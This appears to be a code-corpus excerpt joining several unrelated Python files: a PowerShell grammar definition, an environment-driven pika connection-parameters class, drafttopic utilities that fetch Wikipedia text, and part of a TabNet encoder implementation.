grammar = OR(InvocationExpressionPrime,
MemberAccessPrime,
ElementAccessPrime,
PostIncrementExpressionPrime,
PostDecrementExpressionPrime)
class PrimaryExpression(Grammar):
pe = (OPTIONAL(WHITESPACE), REPEAT(PrimaryExpressionPrime))
grammar = (
Value,
OPTIONAL(OR(REPEAT(pe), REF('PrimaryExpression')))
)
class UnaryExpression(Grammar):
grammar = OR(
PrimaryExpression,
REF('ExpressionWithUnaryOperator'),
)
class CastExpression(Grammar):
grammar = (TypeLiteral, UnaryExpression)
class PreDecrementExpression(Grammar):
grammar = (DashDash, OPTIONAL(NewLines), UnaryExpression)
class PreIncrementExpression(Grammar):
grammar = ("++", OPTIONAL(NewLines), UnaryExpression)
class ExpressionWithUnaryOperator(Grammar):
grammar = OR(
(
OR(",", RE_LITERAL("-bnot"), RE_LITERAL("-not"),
RE_LITERAL("-split"), RE_LITERAL("-join"), "!", "+", Dash),
OPTIONAL(WHITESPACE), UnaryExpression
),
PreIncrementExpression,
PreDecrementExpression,
CastExpression,
)
class ArrayLiteralExpression(Grammar):
grammar = LIST_OF(UnaryExpression,
sep=(OPTIONAL(WHITESPACE), ",", OPTIONAL(WHITESPACE)))
class RangeExpression(Grammar):
grammar = LIST_OF(ArrayLiteralExpression,
sep=("..", OPTIONAL(NewLines)))
class FormatExpression(Grammar):
grammar = LIST_OF(RangeExpression,
sep=(OPTIONAL(WHITESPACE),
FormatOperator,
OPTIONAL(WHITESPACE),
OPTIONAL(NewLines)))
class MultiplicativeExpression(Grammar):
grammar = LIST_OF(FormatExpression,
sep=((OPTIONAL(WHITESPACE),
OR("*", "/", "%"),
OPTIONAL(WHITESPACE)),
OPTIONAL(NewLines)))
class AdditiveExpression(Grammar):
grammar = LIST_OF(MultiplicativeExpression,
sep=(OPTIONAL(WHITESPACE),
OR("+", Dash),
OPTIONAL(WHITESPACE),
OPTIONAL(NewLines)))
class ComparisonExpression(Grammar):
grammar = LIST_OF(AdditiveExpression,
sep=(OPTIONAL(WHITESPACE),
ComparisonOperator,
OPTIONAL(WHITESPACE),
OPTIONAL(NewLines)))
class BitwiseExpression(Grammar):
grammar = LIST_OF(ComparisonExpression,
sep=(OPTIONAL(WHITESPACE),
OR(RE_LITERAL("-band"),
RE_LITERAL("-bor"),
RE_LITERAL("-bxor")),
OPTIONAL(WHITESPACE),
OPTIONAL(NewLines)))
class LogicalExpression(Grammar):
grammar = LIST_OF(BitwiseExpression,
sep=(OPTIONAL(WHITESPACE),
OR(RE_LITERAL("-and"),
RE_LITERAL("-or"),
RE_LITERAL("-xor")),
OPTIONAL(WHITESPACE),
OPTIONAL(NewLines)))
class Expression(Grammar):
grammar = LogicalExpression
# End of grammar for Expressions
# Attributes
class AttributeArgument(Grammar):
grammar = OR(
(OPTIONAL(NewLines), Expression),
(
OPTIONAL(NewLines),
SimpleName,
OPTIONAL(WHITESPACE), "=", OPTIONAL(OPTIONAL(WHITESPACE)),
Expression
)
)
class AttributeArguments(Grammar):
grammar = LIST_OF(AttributeArgument,
sep=(OPTIONAL(WHITESPACE), ",", OPTIONAL(WHITESPACE)))
class AttributeName(Grammar):
grammar = TypeSpec
class Attribute(Grammar):
grammar = OR(
("[", AttributeName, "(", AttributeArguments, OPTIONAL(NewLines),
")", OPTIONAL(NewLines), "]"),
TypeLiteral
)
class AttributeList(Grammar):
grammar = LIST_OF(Attribute, sep=OPTIONAL(WHITESPACE))
class ScriptParameterDefault(Grammar):
grammar = (OPTIONAL(WHITESPACE), "=", OPTIONAL(WHITESPACE), Expression)
class ScriptParameter(Grammar):
grammar = (
OPTIONAL(NewLines),
OPTIONAL(AttributeList), OPTIONAL(WHITESPACE),
Variable, OPTIONAL(ScriptParameterDefault)
)
class ParameterListPrime(Grammar):
grammar_whitespace_mode = "optional"
grammar = (",", ScriptParameter, OPTIONAL(REF('ParameterListPrime')))
class ParameterList(Grammar):
grammar = (ScriptParameter, OPTIONAL(ParameterListPrime))
class CommandName(Grammar):
grammar = OR(GenericToken, GenericTokenWithSubexprStart)
class CommandNameExpr(Grammar):
grammar = OR(CommandName, PrimaryExpression)
class CommandArgument(Grammar):
grammar = CommandNameExpr
class RedirectedFileName(Grammar):
grammar = OR(CommandArgument, PrimaryExpression)
class Redirection(Grammar):
grammar = OR(
MergingRedirectionOperator,
(FileRedirectionOperator, OPTIONAL(WHITESPACE), RedirectedFileName)
)
class CommandElement(Grammar):
grammar = OR(CommandParameter, CommandArgument, Redirection)
class CommandElements(Grammar):
grammar = LIST_OF(CommandElement, sep=OPTIONAL(WHITESPACE))
class CommandModule(Grammar):
grammar = PrimaryExpression
class CommandInvocationOperator(Grammar):
grammar = OR("&", ".")
class Command(Grammar):
grammar = OR(
(CommandName, OPTIONAL(WHITESPACE), OPTIONAL(CommandElements)),
(
CommandInvocationOperator,
OPTIONAL(WHITESPACE),
OPTIONAL(CommandModule),
OPTIONAL(WHITESPACE),
CommandNameExpr,
OPTIONAL(WHITESPACE),
OPTIONAL(CommandElements)
)
)
class PipelineTail(Grammar):
grammar = (
OPTIONAL(WHITESPACE), "|", OPTIONAL(WHITESPACE),
Command, OPTIONAL(REF('PipelineTail'))
)
class AssignmentExpression(Grammar):
# TODO: remove reference
grammar = (Expression, OPTIONAL(WHITESPACE),
AssignmentOperator, OPTIONAL(WHITESPACE),
REF('Statement'))
class Pipeline(Grammar):
grammar = OR(
(Expression, OPTIONAL(Redirection), OPTIONAL(PipelineTail)),
(Command, OPTIONAL(PipelineTail)),
AssignmentExpression,
)
class InlinescriptStatement(Grammar):
grammar = (RE_LITERAL("inlinescript"),
OPTIONAL(WHITESPACE),
StatementBlock)
class ParallelStatement(Grammar):
grammar = (RE_LITERAL("parallel"),
OPTIONAL(WHITESPACE),
StatementBlock)
class SequenceStatement(Grammar):
grammar = (RE_LITERAL("sequence"),
OPTIONAL(WHITESPACE),
StatementBlock)
class DataCommand(Grammar):
grammar = CommandNameExpr
class DataCommandsList(Grammar):
grammar = LIST_OF(
DataCommand,
sep=(OPTIONAL(WHITESPACE), ",", OPTIONAL(WHITESPACE))
)
class DataCommandsAllowed(Grammar):
grammar = (RE_LITERAL("-supportedcommand"),
OPTIONAL(WHITESPACE),
DataCommandsList)
class DataStatement(Grammar):
grammar = (
RE_LITERAL("data"),
OPTIONAL(WHITESPACE),
OPTIONAL(DataCommandsAllowed),
OPTIONAL(WHITESPACE), StatementBlock
)
class ElseIfClause(Grammar):
grammar = (
OPTIONAL(WHITESPACE),
RE_LITERAL("elseif"),
OPTIONAL(WHITESPACE),
"(", OPTIONAL(WHITESPACE), Pipeline, OPTIONAL(WHITESPACE), ")",
OPTIONAL(WHITESPACE),
StatementBlock
)
class ElseIfClauses(Grammar):
grammar = LIST_OF(ElseIfClause, sep=OPTIONAL(WHITESPACE))
class ElseClause(Grammar):
grammar = (
OPTIONAL(WHITESPACE),
RE_LITERAL("else"),
OPTIONAL(WHITESPACE),
StatementBlock
)
class IfStatement(Grammar):
grammar = (
RE_LITERAL("if"),
OPTIONAL(WHITESPACE),
"(", OPTIONAL(WHITESPACE), Pipeline, OPTIONAL(WHITESPACE), ")",
OPTIONAL(WHITESPACE),
StatementBlock, OPTIONAL(ElseIfClauses),
OPTIONAL(ElseClause)
)
class LabelExpression(Grammar):
grammar = OR(SimpleName, UnaryExpression)
class FinallyClause(Grammar):
grammar = (
OPTIONAL(NewLines),
RE_LITERAL("finally"),
OPTIONAL(WHITESPACE), StatementBlock
)
class CatchTypeList(Grammar):
grammar_whitespace_mode = "optional"
grammar = LIST_OF(TypeLiteral, sep=(","), whitespace_mode="optional")
class CatchClause(Grammar):
grammar_whitespace_mode = "optional"
grammar = (
OPTIONAL(NewLines),
RE_LITERAL("catch"),
OPTIONAL(CatchTypeList),
StatementBlock
)
class CatchClauses(Grammar):
grammar_whitespace_mode = "optional"
grammar = REPEAT(CatchClause)
class TryStatement(Grammar):
grammar_whitespace_mode = "optional"
grammar = (
RE_LITERAL("try"), StatementBlock,
OR(
(CatchClauses, FinallyClause),
CatchClauses,
FinallyClause
)
)
class TrapStatement(Grammar):
grammar = (
RE_LITERAL("trap"), OPTIONAL(WHITESPACE), OPTIONAL(TypeLiteral),
OPTIONAL(WHITESPACE), StatementBlock
)
class FlowControlStatement(Grammar):
grammar = OR(
(
OR(RE_LITERAL("break"), RE_LITERAL("continue")),
OPTIONAL((WHITESPACE, LabelExpression))
),
(
OR(RE_LITERAL("throw"), RE_LITERAL("return"), RE_LITERAL("exit")),
OPTIONAL((WHITESPACE, Pipeline))
),
)
class FunctionParameterDeclaration(Grammar):
grammar = (
"(", OPTIONAL(WHITESPACE),
ParameterList, OPTIONAL(WHITESPACE), ")"
)
class FunctionName(Grammar):
grammar = CommandArgument
class FunctionStatement(Grammar):
grammar = (
OR(
RE_LITERAL("function"),
RE_LITERAL("filter"),
RE_LITERAL("workflow")
),
OPTIONAL(WHITESPACE), FunctionName, OPTIONAL(WHITESPACE),
OPTIONAL(FunctionParameterDeclaration), OPTIONAL(WHITESPACE),
"{", OPTIONAL(WHITESPACE), ScriptBlock, OPTIONAL(WHITESPACE), "}"
)
class WhileCondition(Grammar):
grammar = (OPTIONAL(NewLines), Pipeline)
class DoStatement(Grammar):
grammar = (
RE_LITERAL("do"),
OPTIONAL(WHITESPACE), StatementBlock, OPTIONAL(WHITESPACE),
OR(RE_LITERAL("while"), RE_LITERAL("until")),
OPTIONAL(WHITESPACE), "(", WhileCondition, OPTIONAL(WHITESPACE), ")"
)
class WhileStatement(Grammar):
grammar = (
RE_LITERAL("while"), OPTIONAL(WHITESPACE),
"(", OPTIONAL(WHITESPACE), WhileCondition,
OPTIONAL(WHITESPACE), ")", OPTIONAL(WHITESPACE),
StatementBlock
)
class ForInitializer(Grammar):
grammar = Pipeline
class ForCondition(Grammar):
grammar = Pipeline
class ForIterator(Grammar):
grammar = Pipeline
class ForStatement(Grammar):
grammar = OR(
(
RE_LITERAL("for"), OPTIONAL(WHITESPACE), "(",
OPTIONAL(WHITESPACE),
OPTIONAL(ForInitializer), StatementTerminator,
OPTIONAL(WHITESPACE),
OPTIONAL(ForCondition), StatementTerminator,
OPTIONAL(WHITESPACE),
OPTIONAL(ForIterator), OPTIONAL(WHITESPACE), ")",
OPTIONAL(WHITESPACE), StatementBlock
),
(
RE_LITERAL("for"), OPTIONAL(WHITESPACE), "(",
OPTIONAL(WHITESPACE),
OPTIONAL(ForInitializer), StatementTerminator,
OPTIONAL(WHITESPACE),
OPTIONAL(ForCondition), OPTIONAL(WHITESPACE), ")",
OPTIONAL(WHITESPACE), StatementBlock
),
(
RE_LITERAL("for"), OPTIONAL(WHITESPACE),
"(", OPTIONAL(WHITESPACE),
OPTIONAL(ForInitializer), OPTIONAL(WHITESPACE), ")",
OPTIONAL(WHITESPACE), StatementBlock
),
)
class ForeachParameter(Grammar):
grammar = RE_LITERAL("-parallel")
class ForeachStatement(Grammar):
grammar = (
RE_LITERAL("foreach"),
OPTIONAL(WHITESPACE),
OPTIONAL(ForeachParameter),
OPTIONAL(WHITESPACE),
"(", OPTIONAL(WHITESPACE), Variable, OPTIONAL(WHITESPACE),
RE_LITERAL("in"), OPTIONAL(WHITESPACE), Pipeline,
OPTIONAL(WHITESPACE), ")", OPTIONAL(WHITESPACE),
StatementBlock
)
class SwitchClauseCondition(Grammar):
grammar = OR(CommandArgument, PrimaryExpression)
class SwitchClause(Grammar):
grammar = (SwitchClauseCondition, OPTIONAL(WHITESPACE), StatementBlock,
OPTIONAL(StatementTerminators))
class SwitchClauses(Grammar):
grammar_whitespace_mode = "optional"
grammar = LIST_OF(SwitchClause, sep=OPTIONAL(WHITESPACE))
class SwitchBody(Grammar):
grammar = (
OPTIONAL(NewLines), "{", OPTIONAL(NewLines),
OPTIONAL(WHITESPACE), SwitchClauses, OPTIONAL(WHITESPACE), "}"
)
class SwitchFilename(Grammar):
grammar = OR(CommandArgument, PrimaryExpression)
class SwitchCondition(Grammar):
grammar = OR(
("(", OPTIONAL(NewLines), Pipeline, OPTIONAL(NewLines), ")"),
("-file", OPTIONAL(WHITESPACE), SwitchFilename)
)
class SwitchParameter(Grammar):
grammar = OR(*ignore_case_literals(
"-regex", "-rege", "-reg", "-re", "-r", "-wildcard", "-wildcar",
"-wildca", "-wildc", "-wild", "-wil", "-wi", "-w", "-exact",
"-exac", "-exa", "-ex", "-e", "-casesensitive", "-casesensitiv",
"-casesensiti", "-casesensit", "-casesensi", "-casesens",
"-casesen", "-casese", "-cases", "-case", "-cas", "-ca", "-c"
))
class SwitchParameters(Grammar):
grammar_whitespace_mode = "optional"
grammar = LIST_OF(SwitchParameter, sep=OPTIONAL(WHITESPACE))
class SwitchStatement(Grammar):
grammar = (
RE_LITERAL("switch"), OPTIONAL(NewLines), OPTIONAL(WHITESPACE),
OPTIONAL(SwitchParameters), OPTIONAL(WHITESPACE),
SwitchCondition, OPTIONAL(WHITESPACE), SwitchBody
)
class LabeledStatement(Grammar):
grammar = (
OPTIONAL((":", SimpleName, OPTIONAL(WHITESPACE))),
OR(
SwitchStatement,
ForeachStatement,
ForStatement,
WhileStatement,
DoStatement
)
)
class Statement(Grammar):
grammar = OR(
IfStatement,
LabeledStatement,
FunctionStatement,
(FlowControlStatement, StatementTerminator),
TrapStatement,
TryStatement,
DataStatement,
InlinescriptStatement,
ParallelStatement,
SequenceStatement,
(Pipeline, OPTIONAL(StatementTerminator))
)
class InputCharacter(Grammar):
grammar = EXCEPT(ANY, NewLineCharacter, max=1)
class InputCharacters(Grammar):
grammar = REPEAT(InputCharacter)
class Hashes(Grammar):
grammar = REPEAT("#")
class NotGreaterThanOrHash(Grammar):
grammar = ANY_EXCEPT("#>", max=1)
class DelimitedCommentSection(Grammar):
grammar = OR(">", (OPTIONAL(Hashes), NotGreaterThanOrHash))
class DelimitedCommentText(Grammar):
grammar = REPEAT(DelimitedCommentSection)
class DelimitedComment(Grammar):
grammar = ("<#", OPTIONAL(DelimitedCommentText), Hashes, ">")
class RequiresComment(Grammar):
grammar = ("#requires", WHITESPACE, CommandArgument)
class SingleLineComment(Grammar):
grammar = ("#", OPTIONAL(WHITESPACE), OPTIONAL(InputCharacters))
class Comment(Grammar):
grammar = OR(SingleLineComment, RequiresComment, DelimitedComment)
class SignatureBegin(Grammar):
grammar = (NewLineCharacter, "# SIG # Begin signature block",
NewLineCharacter)
class SignatureEnd(Grammar):
grammar = (NewLineCharacter, "# SIG # End signature block",
NewLineCharacter)
class Signature(Grammar):
grammar = LIST_OF(SingleLineComment, sep=NewLineCharacter)
class SignatureBlock(Grammar):
grammar = (SignatureBegin, Signature, SignatureEnd)
class Token(Grammar):
grammar = OR(
Keyword,
Variable,
Command,
CommandParameter,
IntegerLiteral,
RealLiteral,
StringLiteral,
TypeLiteral,
OperatorOrPunctuator,
)
class InputElement(Grammar):
grammar = OR(WHITESPACE, Comment, Token)
class InputElements(Grammar):
grammar = LIST_OF(InputElement, sep=NewLineCharacter)
class Input(Grammar):
grammar = OPTIONAL(InputElements), OPTIONAL(SignatureBlock)
``` |
{
"source": "5uper5hoot/PikaExamples",
"score": 3
} |
#### File: PikaExamples/pikatools/connection.py
```python
import os
import ssl
import pika
# alternate bool constructor that first converts arg to int.
def bool_(s):
return bool(int(s))
class EnvConnectionParameters(pika.ConnectionParameters):
""" Values for all connection parameters are established using
environment variables. If there is not an environment variable
set for a given attribute, it will fall back to the pika
default as established in `connection.Parameters` class.
Format of scalar attribute environment variable is:
`PIKA_<NAME_OF_ATTR_IN_CAPS>`
For example, to set host: `export PIKA_HOST = '123.456.789.10'`.
Scalar attribute names (coerced type, default) are:
- backpressure_detection (bool, False)
- blocked_connection_timeout (float, None)
- channel_max (int, 65535)
- connection_attempts (int, 1)
- frame_max (int, 131072)
- heartbeat* (int, None)
- host (str, 'localhost')
- locale (str, 'en_US')
- retry_delay (float, 2.0)
- socket_timeout (float, 10.0)
- ssl (bool, False)
- port (int, 5672 or 5671 depending on ssl)
- virtual_host (str, '/')
Connection parameters that require a collection of values or a
specific type need to be of the format:
`PIKA_<ATTR_NAME_IN_CAPS>_<VALUE_NAME_IN_CAPS>`
Parameter names (default) that require a mapping of values include:
- client_properties (None)
- credentials
(pika_credentials.PlainCredentials('guest', 'guest'))
- ssl_options (None)
- tcp_options (None)
Specific details of the handling of each attribute that requires a
mapping follows:
client_properties
-----------------
Format env vars as:
`PIKA_CLIENT_PROPERTIES_<VALUE_NAME_IN_CAPS>`
Value names that can be set here are 'product', 'platform',
'information', 'version'. client_properties also accepts a mapping
called 'capabilities' which can be controlled by setting env vars
with the format:
`PIKA_CLIENT_PROPERTIES_CAPABILITIES_<KEY_NAME_IN_CAPS>
The capabilities key names that are searched for are,
'authentication_failure_close', 'basic.nack', 'connection.blocked',
'consumer_cancel_notify', and 'publisher_confirms. All accepting
boolean values (set env var as 1 or 0).
credentials
-----------
Format env vars as:
`PIKA_CREDENTIALS_<ATTR_NAME_IN_CAPS>`
If credentials are passed in via env vars, then the credentials
object is taken to be a credentials.PlainCredentials object and
the attrib names that are searched for are, 'username' (str),
'password' (str), and 'erase_on_connect' (bool, set as 1, or 0).
ssl_options
-----------
Format env vars as:
`PIKA_SSL_OPTIONS_<ATTR_NAME_IN_CAPS>`
Where attr name is one of:
- keyfile (str)
- key_password (str)
- certfile (str)
- server_side (bool)
- verify_mode* (str)
- ssl_version* (str)
- cafile (str)
- capath (str)
- cadata (str)
- do_handshake_on_connect (bool)
- suppress_ragged_eofs (bool)
- ciphers (str)
- server_hostname (str)
verify_mode must be one of 'CERT_NONE', 'CERT_OPTIONAL' or
'CERT_REQUIRED', if set. ssl_version must be the name one of the
protocol instances found in the ssl module, e.g. 'PROTOCOL_TLS'.
The value will be used to get the object of the same name from the
ssl module.
tcp_options
-----------
Format env vars as:
`PIKA_TCP_OPTIONS_<KEY_NAME_IN_CAPS>`
Key names sought are, 'TCP_KEEPIDLE', 'TCP_KEEPINTVL',
'TCP_KEEPCNT', 'TCP_USER_TIMEOUT'.
"""
# Protect against accidental assignment of an invalid attribute
__slots__ = ()
def __init__(self, heartbeat_callable=None):
def _env_or_default(attr, cast):
""" Return environment variable or existing value."""
try:
return cast(os.environ[f"PIKA_{attr.upper()}"])
except KeyError:
return getattr(self, attr)
# pre-populates all attrs with default values
super(pika.ConnectionParameters, self).__init__()
for attr, cast in [
("backpressure_detection", bool_),
("blocked_connection_timeout", float),
("channel_max", int),
("connection_attempts", int),
("frame_max", int),
("heartbeat", int),
("host", str),
("locale", str),
("retry_delay", float),
("socket_timeout", float),
("ssl", bool_),
("virtual_host", str),
]:
setattr(self, attr, _env_or_default(attr, cast))
if os.getenv("PIKA_PORT", None):
self.port = os.getenv("PIKA_PORT")
else:
if self.ssl:
self.port = super(
pika.ConnectionParameters, self
).DEFAULT_SSL_PORT
else:
self.port = super(pika.ConnectionParameters, self).DEFAULT_PORT
self.client_properties = self._get_client_properties()
self.credentials = self._get_credentials()
self.ssl_options = self._get_ssl_options()
self.tcp_options = self._get_tcp_options()
@staticmethod
def _get_related_env_vars(prefix, keys, casts=None):
if not casts:
casts = [str for k in keys]
d = {}
for k, c in zip(keys, casts):
try:
d[k] = c(os.environ[f"{prefix}_{k.upper()}"])
except KeyError:
pass
return d
def _get_client_properties(self):
properties_prefix = "PIKA_CLIENT_PROPERTIES"
properties_keys = ["product", "platform", "information", "version"]
properties = self._get_related_env_vars(
properties_prefix, properties_keys
)
capabilities_prefix = "PIKA_CLIENT_PROPERTIES_CAPABILITIES"
capabilities_keys = [
"authentication_failure_close",
"basic.nack",
"connection.blocked",
"consumer_cancel_notify",
"publisher_confirms",
]
capabilities_casts = (bool_ for s in capabilities_keys)
capabilities = self._get_related_env_vars(
capabilities_prefix, capabilities_keys, capabilities_casts
)
if capabilities:
properties["capabilities"] = capabilities
return properties or getattr(self, "client_properties")
def _get_credentials(self):
prefix = "PIKA_CREDENTIALS"
keys = ["username", "password", "erase_on_connect"]
casts = [str, str, lambda s: bool(int(s))]
credentials = self._get_related_env_vars(prefix, keys, casts)
if credentials:
return pika.PlainCredentials(**credentials)
else:
return getattr(self, "credentials")
def _get_ssl_options(self):
prefix = "PIKA_SSL_OPTIONS"
atrs = {
"keyfile": str,
"key_password": str,
"certfile": str,
"server_side": bool_,
"verify_mode": str,
"ssl_version": str,
"cafile": str,
"capath": str,
"cadata": str,
"do_handshake_on_connect": bool_,
"suppress_ragged_eofs": bool_,
"ciphers": str,
"server_hostname": str,
}
ssl_options = self._get_related_env_vars(
prefix, atrs.keys(), atrs.values()
)
if ssl_options:
if "verify_mode" in ssl_options:
ssl_options["verify_mode"] = getattr(
ssl, ssl_options["verify_mode"]
)
if "ssl_version" in ssl_options:
ssl_options["ssl_version"] = getattr(
ssl, ssl_options["ssl_version"]
)
return pika.SSLOptions(**ssl_options)
else:
return getattr(self, "ssl_options")
def _get_tcp_options(self):
prefix = "PIKA_TCP_OPTIONS"
keys = [
"TCP_KEEPIDLE",
"TCP_KEEPINTVL",
"TCP_KEEPCNT",
"TCP_USER_TIMEOUT",
]
casts = [int] * 4
tcp_options = self._get_related_env_vars(prefix, keys, casts)
return tcp_options or getattr(self, "tcp_options")
``` |
{
"source": "5uperpalo/drafttopic",
"score": 2
} |
#### File: drafttopic/drafttopic/drafttopic.py
```python
import sys
import traceback
from importlib import import_module
USAGE = """Usage:
drafttopic (-h | --help)
drafttopic <utility> [-h | --help]\n"""
def main():
if len(sys.argv) < 2:
sys.stderr.write(USAGE)
sys.exit(1)
elif sys.argv[1] in ("-h", "--help"):
sys.stderr.write(__doc__ + "\n")
sys.exit(1)
elif sys.argv[1][:1] == "-":
sys.stderr.write(USAGE)
sys.exit(1)
module_name = sys.argv[1]
try:
module = import_module(".utilities." + module_name,
package="drafttopic")
except ImportError:
sys.stderr.write(traceback.format_exc())
sys.stderr.write("Could not load utility {0}.\n".format(module_name))
sys.exit(1)
module.main(sys.argv[2:])
```
#### File: drafttopic/utilities/fetch_article_text.py
```python
import logging
import sys
from concurrent.futures import ThreadPoolExecutor
import mwapi
from docopt import docopt
from revscoring.utilities.util import dump_observation, read_observations
from .fetch_draft_text import DRAFTTOPIC_UA, build_fetch_text
logger = logging.getLogger(__name__)
def main(argv=None):
args = docopt(__doc__, argv=argv)
logging.basicConfig(
level=logging.INFO if not args['--debug'] else logging.DEBUG,
format='%(asctime)s %(levelname)s:%(name)s -- %(message)s')
logging.getLogger("urllib3.connectionpool").setLevel(logging.WARNING)
if args['--input'] == '<stdin>':
observations = read_observations(sys.stdin)
else:
observations = read_observations(open(args['--input']))
if args['--output'] == '<stdout>':
output = sys.stdout
else:
output = open(args['--output'], 'w')
threads = int(args['--threads'])
session = mwapi.Session(args['--api-host'],
user_agent=DRAFTTOPIC_UA)
run(observations, session, threads, output)
def run(observations, session, threads, output):
for obs in fetch_article_texts(observations, session, threads):
dump_observation(obs, output)
def fetch_article_texts(observations, session, threads):
"""
Fetches article (recent revision) text for observations from a
MediaWiki API.
"""
executor = ThreadPoolExecutor(max_workers=threads)
_fetch_article_text = build_fetch_text(build_get_recent_revision(session))
for obs in executor.map(_fetch_article_text, observations):
if obs is not None:
yield obs
logger.debug("Write {0} with {1} chars of text."
.format(obs['title'], len(obs['text'])))
def build_get_recent_revision(session):
def get_recent_revision(title):
return session.get(
action="query",
prop="revisions",
rvprop=["content", "ids"],
titles=title,
redirects=True,
rvlimit=1,
rvdir="older",
formatversion=2,
rvslots=["main"]
)
return get_recent_revision
``` |
{
"source": "5uperpalo/pytorch-widedeep",
"score": 2
} |
#### File: models/tabnet/tab_net.py
```python
import warnings
import numpy as np
import torch
import torch.nn.functional as F
from torch import nn
from pytorch_widedeep.wdtypes import * # noqa: F403
from pytorch_widedeep.models.tabnet import sparsemax
def initialize_non_glu(module, input_dim: int, output_dim: int):
gain_value = np.sqrt((input_dim + output_dim) / np.sqrt(4 * input_dim))
torch.nn.init.xavier_normal_(module.weight, gain=gain_value)
return
def initialize_glu(module, input_dim: int, output_dim: int):
gain_value = np.sqrt((input_dim + output_dim) / np.sqrt(input_dim))
torch.nn.init.xavier_normal_(module.weight, gain=gain_value)
return
class GBN(torch.nn.Module):
"""
Ghost Batch Normalization
https://arxiv.org/abs/1705.08741
"""
def __init__(
self, input_dim: int, virtual_batch_size: int = 128, momentum: float = 0.01
):
super(GBN, self).__init__()
self.virtual_batch_size = virtual_batch_size
self.bn = nn.BatchNorm1d(input_dim, momentum=momentum)
def forward(self, X: Tensor) -> Tensor:
chunks = X.chunk(int(np.ceil(X.shape[0] / self.virtual_batch_size)), 0)
res = [self.bn(x_) for x_ in chunks]
return torch.cat(res, dim=0)
class GLU_Layer(nn.Module):
def __init__(
self,
input_dim: int,
output_dim: int,
dropout: float,
fc: nn.Module = None,
ghost_bn: bool = True,
virtual_batch_size: int = 128,
momentum: float = 0.02,
):
super(GLU_Layer, self).__init__()
if fc:
self.fc = fc
else:
self.fc = nn.Linear(input_dim, 2 * output_dim, bias=False)
initialize_glu(self.fc, input_dim, 2 * output_dim)
if ghost_bn:
self.bn: Union[GBN, nn.BatchNorm1d] = GBN(
2 * output_dim, virtual_batch_size=virtual_batch_size, momentum=momentum
)
else:
self.bn = nn.BatchNorm1d(2 * output_dim, momentum=momentum)
self.dp = nn.Dropout(dropout)
def forward(self, X: Tensor) -> Tensor:
return self.dp(F.glu(self.bn(self.fc(X))))
class GLU_Block(nn.Module):
def __init__(
self,
input_dim: int,
output_dim: int,
dropout: float,
n_glu: int = 2,
first: bool = False,
shared_layers: nn.ModuleList = None,
ghost_bn: bool = True,
virtual_batch_size: int = 128,
momentum: float = 0.02,
):
super(GLU_Block, self).__init__()
self.first = first
if (shared_layers is not None) and (n_glu != len(shared_layers)):
self.n_glu = len(shared_layers)
warnings.warn(
"If 'shared_layers' is nor None, 'n_glu' must be equal to the number of shared_layers."
"Got n_glu = {} and n shared_layers = {}. 'n_glu' has been set to {}".format(
n_glu, len(shared_layers), len(shared_layers)
),
UserWarning,
)
else:
self.n_glu = n_glu
glu_dim = [input_dim] + [output_dim] * self.n_glu
self.glu_layers = nn.ModuleList()
for i in range(self.n_glu):
fc = shared_layers[i] if shared_layers else None
self.glu_layers.append(
GLU_Layer(
glu_dim[i],
glu_dim[i + 1],
dropout,
fc=fc,
ghost_bn=ghost_bn,
virtual_batch_size=virtual_batch_size,
momentum=momentum,
)
)
def forward(self, X: Tensor) -> Tensor:
scale = torch.sqrt(torch.FloatTensor([0.5]).to(X.device))
if self.first: # the first layer of the block has no scale multiplication
x = self.glu_layers[0](X)
layers_left = range(1, self.n_glu)
else:
x = nn.Identity()(X)
layers_left = range(self.n_glu)
for glu_id in layers_left:
x = torch.add(x, self.glu_layers[glu_id](x)) * scale
return x
class FeatTransformer(nn.Module):
def __init__(
self,
input_dim: int,
output_dim: int,
dropout: float,
shared_layers: nn.ModuleList,
n_glu_step_dependent: int,
ghost_bn=True,
virtual_batch_size=128,
momentum=0.02,
):
super(FeatTransformer, self).__init__()
params = {
"ghost_bn": ghost_bn,
"virtual_batch_size": virtual_batch_size,
"momentum": momentum,
}
self.shared = GLU_Block(
input_dim,
output_dim,
dropout,
n_glu=len(shared_layers),
first=True,
shared_layers=shared_layers,
**params
)
self.step_dependent = GLU_Block(
output_dim,
output_dim,
dropout,
n_glu=n_glu_step_dependent,
first=False,
**params
)
def forward(self, X: Tensor) -> Tensor:
return self.step_dependent(self.shared(X))
class AttentiveTransformer(nn.Module):
def __init__(
self,
input_dim: int,
output_dim: int,
mask_type: str = "sparsemax",
ghost_bn=True,
virtual_batch_size=128,
momentum=0.02,
):
super(AttentiveTransformer, self).__init__()
self.fc = nn.Linear(input_dim, output_dim, bias=False)
initialize_non_glu(self.fc, input_dim, output_dim)
if ghost_bn:
self.bn: Union[GBN, nn.BatchNorm1d] = GBN(
output_dim, virtual_batch_size=virtual_batch_size, momentum=momentum
)
else:
self.bn = nn.BatchNorm1d(output_dim, momentum=momentum)
if mask_type == "sparsemax":
self.mask: Union[Sparsemax, Entmax15] = sparsemax.Sparsemax(dim=-1)
elif mask_type == "entmax":
self.mask = sparsemax.Entmax15(dim=-1)
else:
raise NotImplementedError(
"Please choose either 'sparsemax' or 'entmax' as masktype"
)
def forward(self, priors: Tensor, processed_feat: Tensor) -> Tensor:
x = self.bn(self.fc(processed_feat))
x = torch.mul(x, priors)
return self.mask(x)
class TabNetEncoder(nn.Module):
def __init__(
self,
input_dim: int,
n_steps: int = 3,
step_dim: int = 8,
attn_dim: int = 8,
dropout: float = 0.0,
n_glu_step_dependent: int = 2,
n_glu_shared: int = 2,
ghost_bn: bool = True,
virtual_batch_size: int = 128,
momentum: float = 0.02,
gamma: float = 1.3,
epsilon: float = 1e-15,
mask_type: str = "sparsemax",
):
super(TabNetEncoder, self).__init__()
self.input_dim = input_dim
self.n_steps = n_steps
self.step_dim = step_dim
self.attn_dim = attn_dim
self.gamma = gamma
self.epsilon = epsilon
self.initial_bn = nn.BatchNorm1d(input_dim, momentum=0.01)
params = {
"ghost_bn": ghost_bn,
"virtual_batch_size": virtual_batch_size,
"momentum": momentum,
}
shared_layers = nn.ModuleList()
for i in range(n_glu_shared):
if i == 0:
shared_layers.append(
nn.Linear(input_dim, 2 * (step_dim + attn_dim), bias=False)
)
else:
shared_layers.append(
nn.Linear(
step_dim + attn_dim, 2 * (step_dim + attn_dim), bias=False
)
)
self.initial_splitter = FeatTransformer(
input_dim,
step_dim + attn_dim,
dropout,
shared_layers,
n_glu_step_dependent,
**params
)
self.feat_transformers = nn.ModuleList()
self.attn_transformers = nn.ModuleList()
for step in range(n_steps):
feat_transformer = FeatTransformer(
input_dim,
step_dim + attn_dim,
dropout,
shared_layers,
n_glu_step_dependent,
**params
)
